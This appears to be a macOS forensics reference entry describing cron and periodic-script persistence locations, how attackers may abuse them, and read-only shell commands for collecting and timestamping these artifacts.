Cron Jobs & Periodic Scripts

Location

Description

macOS supports both traditional cron job scheduling via crontab and the periodic system that runs maintenance scripts at daily, weekly, and monthly intervals via launchd. User crontabs are stored in /usr/lib/cron/tabs/ and system-wide tasks in /etc/crontab. The periodic directories contain shell scripts executed by the com.apple.periodic-* LaunchDaemons.

Forensic Value

While LaunchAgents and LaunchDaemons are the dominant macOS scheduling mechanisms, cron jobs remain functional and are used by attackers who are more familiar with Linux persistence techniques. User crontabs in /usr/lib/cron/tabs/ may contain entries that download and execute payloads from external URLs. Scripts added to /etc/periodic/daily/ execute as root once per day and can fly under the radar because administrators expect files in these directories. File modification timestamps and content analysis of periodic scripts identify unauthorized additions.

Tools Required

Collection Commands

for user in $(dscl . -list /Users | grep -v "^_"); do echo "=== $user ===" && sudo crontab -l -u "$user" 2>/dev/null; done > /forensics/crontabs.txt

find /etc/periodic/ -type f -exec stat -f "%Sm %N" -t "%Y-%m-%d %H:%M:%S" {} \; > /forensics/periodic_scripts_timeline.txt

sudo cp -r /usr/lib/cron/tabs/ /etc/periodic/ /forensics/cron_periodic_backup/

sudo stat -f "%Sm %N" /etc/crontab /usr/lib/cron/tabs/* 2>/dev/null > /forensics/crontab_timestamps.txt

Collection Constraints

• •Paths, schemas, and permission boundaries vary by macOS release, Full Disk Access state, and whether data came from a live collection, mounted image, or backup source.

MITRE ATT&CK Techniques

References